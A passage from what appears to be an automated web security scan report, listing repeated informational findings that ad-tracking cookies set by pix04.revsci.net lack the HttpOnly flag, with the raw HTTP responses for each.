P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:05:11 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.231. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/812722846.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vIheCK3a3RumjiC3vPwuMZAz/Fb6dCVvlO9Aw5pwWF9+EAAeV2TzsgUGaQv/2ZQe8rRPH5+5M9R39Ral+qP2V0y/+p2zRg1hLjVsjl1uwVWfKX77O/YPBY7dk2EjwvOdsWypIoh5qvkdbyxlttmCesrPwFb3/F6egiCumX5QrgmivUjRchduzfmZbwpTxy48V0WNVX4PvVH5gTOeAh2tnOpYIRwgMo1Y55QogoAQ+LrZpfryua2rcBmooHEc/TPGSsRiiDTykHRSaRMKCZmWMl334vqqCDsgfxTkfFRDJiwmuN0wq2iNRtk37UWndpoYVv1oFEpCVZNQU4C1q6lU5uQwGrTGJkFYxk+SOGtNllWGDyeMeLcz6EXlCQLXUM45YSnoRE/CFCdK49wepWGR2w0OLPEDVjNdOOen2Iuk5ZAbz6ympB6lcs/X3NM0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:56:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vIheCK3a3RumjiC3vPwuMZAz/Fb6dCVvlO9Aw5pwWF9+EAAeV2TzsgUGaQv/2ZQe8rRPH5+5M9R39Ral+qP2V0y/+p2zRg1hLjVsjl1uwVWfKX77O/YPBY7dk2EjwvOdsWypIoh5qvkdbyxlttmCesrPwFb3/F6egiCumX5QrgmivUjRchduzfmZbwpTxy48V0WNVX4PvVH5gTOeAh2tnOpYIRwgMo1Y55QogoAQ+LrZpfryua2rcBmooHEc/TPGSsRiiDTykHRSaRMKCZmWMl334vqqCDsgfxTkfFRDJiwmuN0wq2iNRtk37UWndpoYVv1oFEpCVZNQU4C1q6lU5uQwGrTGJkFYxk+SOGtNllWGDyeMeLcz6EXlCQLXUM45YSnoRE/CFCdK49wepWGR2w0OLPEDVjNdOOen2Iuk5ZAbz6ympB6lcs/X3NM0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:56:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:56:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.232. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/814191239.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50d/kuZA/wB4kkYzSDmmigS0klIKQl8bq4XH6tE2Dcioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG16kloGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:55:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50d/kuZA/wB4kkYzSDmmigS0klIKQl8bq4XH6tE2Dcioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG16kloGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:55:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:55:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.233. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/821864121.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBegtiNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54egzBWSJbEl9x+KwhkZ/L92bTvudQtQPxONyOZ7HikgclZI512pKX3M0xad6Ob271txsrs9b0Oz1Z7kPOLjNPLoxd07mty+69lekIPFKynhZKODufS/qVPftLwg4SHkAQdGCv7sxTPHqduXr1eFz4GuXBQzFZmovJP50LJ9LfJzZ0cEqo94AHzG328DlOp3pWURvqQeuQD++OpNt8z2EVRz4KiLXeBbx4qcJhurwtdDVDn1cvqzgNMc=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:11:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBegtiNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54egzBWSJbEl9x+KwhkZ/L92bTvudQtQPxONyOZ7HikgclZI512pKX3M0xad6Ob271txsrs9b0Oz1Z7kPOLjNPLoxd07mty+69lekIPFKynhZKODufS/qVPftLwg4SHkAQdGCv7sxTPHqduXr1eFz4GuXBQzFZmovJP50LJ9LfJzZ0cEqo94AHzG328DlOp3pWURvqQeuQD++OpNt8z2EVRz4KiLXeBbx4qcJhurwtdDVDn1cvqzgNMc=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:11:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:11:54 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.234. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/833474274.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQm8locHc+gQ4O3XY0n+Y1R9p5LQR/PIErQWNBrf/GhmELDb2SBYVi45leib6f+TcjX1aW0zQ/r0ApwP/UaVQAaikEpJEADFgWdDtKIlXFv4PL1BUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKvRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHV+aNKdWI3SWQJ9zzYJE3gOggYzS8l60cF0fRhYKZWqkcWW0BvbeT4FW1ruM8/GaXYHlxlcxlY1dHYTAJwSnBh56YsGo3OpM23g4Sg+W/5oOiiW7+as1QctRnSvvKtemWe1VHWAyJahT35bdZIwQmvQ48CkKLsbsrvtD5EoRz6nG/LcmuBS3Jn3/zoEOEBUzi69M6mTC+PEWZWQJbfRE+E5WVIp3Thw4yJ3cPPTklIFmWHjNjV1LLysLDkP3dWz0uKtSZgBTjHRQMRMICkT3e3WvYJStMWuk4t/bgY81r+yolKvpVebOAG0riueU6NKA2RTHy2dC6z8wrqYdn7xOgfCW63/UTu+4l45BNmrY1KteHuYcz51soyYLRWIiYVYTrR805k+41339fakhMofXoGz0fn+gFNr+iRy9hrLmSSF+HDB+jhnxcvr17NN0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:29:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQm8locHc+gQ4O3XY0n+Y1R9p5LQR/PIErQWNBrf/GhmELDb2SBYVi45leib6f+TcjX1aW0zQ/r0ApwP/UaVQAaikEpJEADFgWdDtKIlXFv4PL1BUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKvRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHV+aNKdWI3SWQJ9zzYJE3gOggYzS8l60cF0fRhYKZWqkcWW0BvbeT4FW1ruM8/GaXYHlxlcxlY1dHYTAJwSnBh56YsGo3OpM23g4Sg+W/5oOiiW7+as1QctRnSvvKtemWe1VHWAyJahT35bdZIwQmvQ48CkKLsbsrvtD5EoRz6nG/LcmuBS3Jn3/zoEOEBUzi69M6mTC+PEWZWQJbfRE+E5WVIp3Thw4yJ3cPPTklIFmWHjNjV1LLysLDkP3dWz0uKtSZgBTjHRQMRMICkT3e3WvYJStMWuk4t/bgY81r+yolKvpVebOAG0riueU6NKA2RTHy2dC6z8wrqYdn7xOgfCW63/UTu+4l45BNmrY1KteHuYcz51soyYLRWIiYVYTrR805k+41339fakhMofXoGz0fn+gFNr+iRy9hrLmSSF+HDB+jhnxcvr17NN0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:29:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:29:31 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.235. http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/837302366.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFJ0+FaAIQl6mdYdLQRDvQQIIfUaKpRumaNZVoy5fLC+2anZFaFgF267p/sMT/w0fq9nnd1ZKAKAstSPo/aEd6q4lAXSF3WmnEkpdYruGHMjvmSx9xmhjg/+yIQiaZrxZTjB2pDX4GX/0psICOo+aXU2cRcddt7VWVQyitLgFReN/nXTL1eZurE1gjxVE5suSHhqnXdvSs7dZURLQhFpbCz2JK8m0ta/8G7qQlOqxnpHs0TyS3sLVa+5yFqxAy5GG99X9vXMqDdt2rPIkDetgBkk6SJ3/CzKQBQVfDwmOJ7w==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:12:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0+FaAIQl6mdYdLQRDvQQIIfUaKpRumaNZVoy5fLC+2anZFaFgF267p/sMT/w0fq9nnd1ZKAKAstSPo/aEd6q4lAXSF3WmnEkpdYruGHMjvmSx9xmhjg/+yIQiaZrxZTjB2pDX4GX/0psICOo+aXU2cRcddt7VWVQyitLgFReN/nXTL1eZurE1gjxVE5suSHhqnXdvSs7dZURLQhFpbCz2JK8m0ta/8G7qQlOqxnpHs0TyS3sLVa+5yFqxAy5GG99X9vXMqDdt2rPIkDetgBkk6SJ3/CzKQBQVfDwmOJ7w==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:12:11 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:12:11 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.236. http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/851863014.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcLNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewu3QAx3uKzb2aFbWjI69eif+fODfjX2iW0zQnr2ApwL/IaWQAWmnFp61mTBgWbeLLplHNs08LFzYabwcAaYOpnwILBLA0IVDPkkGA4cG8987iuBlXl4yixD++rOGTsZv2eIAi6/tStrKkyKC/JXks5vOAC9GNAaNN9SIPSSgIVwuLxxEDZFtogZob6stUpVF0bF5RnkJXewaqSRMWqhntmKPHS7fwBMYESD1jsZuIh+afeGY/a+MmkAbSj6BxvAnX3PBxUJB08WfZWzRHSxSjL0s1nQn1aBhcdXO7MEbvH29Jbh9pz9psldaXNjS8nNO0nRaEioGGyf0mdW2GmFF3uqepO/hUq5hXY+RVEvbn1mH27KkDH58TGmNbI6JzmG3Q6GGoKtfyZ40FhOEsB1ykXVT/0VlHeufK0QtN+TBo1efXnXmzm8dtxJLmJeO0ZLOHVbzTTtO16Tur2LMvMzRS+5ImgOMLPdOW9Wn/gqImudjUr0507hjojcVEeBpMjdx1AfR/zyoc3NAePEy2cUAH4tO2pCz/7zt3aok6y67TthGh+zGb8FwVSP4OwJX4zAkzKYNj3o3tUIP6c5evz0uNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:14:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcLNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewu3QAx3uKzb2aFbWjI69eif+fODfjX2iW0zQnr2ApwL/IaWQAWmnFp61mTBgWbeLLplHNs08LFzYabwcAaYOpnwILBLA0IVDPkkGA4cG8987iuBlXl4yixD++rOGTsZv2eIAi6/tStrKkyKC/JXks5vOAC9GNAaNN9SIPSSgIVwuLxxEDZFtogZob6stUpVF0bF5RnkJXewaqSRMWqhntmKPHS7fwBMYESD1jsZuIh+afeGY/a+MmkAbSj6BxvAnX3PBxUJB08WfZWzRHSxSjL0s1nQn1aBhcdXO7MEbvH29Jbh9pz9psldaXNjS8nNO0nRaEioGGyf0mdW2GmFF3uqepO/hUq5hXY+RVEvbn1mH27KkDH58TGmNbI6JzmG3Q6GGoKtfyZ40FhOEsB1ykXVT/0VlHeufK0QtN+TBo1efXnXmzm8dtxJLmJeO0ZLOHVbzTTtO16Tur2LMvMzRS+5ImgOMLPdOW9Wn/gqImudjUr0507hjojcVEeBpMjdx1AfR/zyoc3NAePEy2cUAH4tO2pCz/7zt3aok6y67TthGh+zGb8FwVSP4OwJX4zAkzKYNj3o3tUIP6c5evz0uNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:14:02 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:14:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.237. http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/85990292.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQX1dfcmxcf0Wvq23q+MT2iJYg/xrxzjNp79VYSobSVOD7WX/S9Z8O4BnUHBiqvRIkPnhSUmUe6IqBE7GhEwMzNJJcuu2seC5Iq2xH7Qywe+4DJyaRxTw/mss73j5pLn5ZanpEu8QCmuhtkv8oye8PJyXzHyFFqvQHvEUUW1Bd8WQ4/TVd06R1uszI4TYM73mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTu+7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSn4RE/BtirGw5welW2A2Iz0fGzTVF72idj9hrLuiklOHPB6nyU9du/DMNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:54:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQX1dfcmxcf0Wvq23q+MT2iJYg/xrxzjNp79VYSobSVOD7WX/S9Z8O4BnUHBiqvRIkPnhSUmUe6IqBE7GhEwMzNJJcuu2seC5Iq2xH7Qywe+4DJyaRxTw/mss73j5pLn5ZanpEu8QCmuhtkv8oye8PJyXzHyFFqvQHvEUUW1Bd8WQ4/TVd06R1uszI4TYM73mqCpBDmxZhu+yUoLnATqy/tiKdn75egfCW6/fUTu+7FXa+mttDWsXOHscmzGcdcNnz1ng2pZ45YSn4RE/BtirGw5welW2A2Iz0fGzTVF72idj9hrLuiklOHPB6nyU9du/DMNNE=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:54:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:54:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.238. http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/870883424.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D1q6YfT09jcb17LPDX8fRNzIxBY9d58s8KWjBNmXwVXJJ7UHisDFf9Ey7Ms7Wr2plDqEMX6bjjECP++dzpXLEjq+VGlvjNs1C2NYn//UK1d0sLFeGRAwP30BeDDG9nGG8OAncZJxK/3iMf/qG1fOQh11zX5a4KeTBQK17RFxsTNh2j2fKLpXHqWExgWzJQhuIp3yPqX/iP0Fdb1X0mccqxQ1tIULcMXty6FxRR2tEUdD/lOGzmw1dAxjKLqWZViDH+nw9VjH2eHWq1baas761ofPzSk/CbXGLKG0KjU+ETCo0d1J28pAv0u; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:14:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
